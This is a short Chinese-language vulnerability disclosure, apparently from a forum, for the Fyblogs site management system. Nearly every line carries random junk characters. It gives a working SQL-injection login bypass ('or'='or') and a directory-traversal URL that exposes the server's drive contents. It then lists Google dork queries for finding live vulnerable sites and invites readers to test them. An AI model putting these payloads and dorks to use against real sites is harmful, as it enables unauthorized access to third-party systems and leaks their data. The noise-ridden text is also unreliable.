漏洞类型: 未授权访问/权限绕过 E2 p' ?/ c/ D, d" A2 U
3 H2 W' |: c# c( J4 a+ t5 q简要描述:1 c5 M U/ \/ `" I V7 j3 c" f
0 B* b% J1 G& N: \Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
0 Z$ r7 w+ B% G& {4 G7 K( e, u$ _1 d8 S! t( s7 ?
详细说明:
( r4 ?0 V! l( d5 O3 t$ G. J( O( P+ U. W5 }- J+ w& T2 R' W
后台万能密码 'or'='or'
" K- H. [( c: W+ o7 J) f后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
9 B" E1 t0 X8 t: E D9 w: T/ P, y; fadmin/uploadfile.asp?currentFolder=/upfiles/../
8 l1 f) ~* Y+ A; p$ ]7 s9 ~' n" D+ b1 B6 O+ {# o) J
漏洞证明:
/ w3 W3 C$ E2 }7 r
, d% b! R3 k$ Y: u" C8 B# L谷歌:inurl:type.asp?id=1 新闻中心
; {' n+ K) u g/ `. @$ l9 n或者 :inurl:download_ok.asp? z& g/ y" O& ]: d$ r8 |/ J4 ^
7 r# c# g1 n# }! F) `; b( a1 M& K
可以测试
9 e' T' r R* G3 K C+ }2 j4 S6 {8 V/ j# l: f
3 Z" Q! `: x; o, f/ j& x; |- M4 z
|